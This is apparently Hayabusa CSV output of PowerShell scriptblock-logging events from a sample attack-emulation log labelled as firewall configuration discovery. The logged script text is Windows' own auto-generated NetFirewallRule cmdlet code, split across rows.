16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Disable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdle",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } 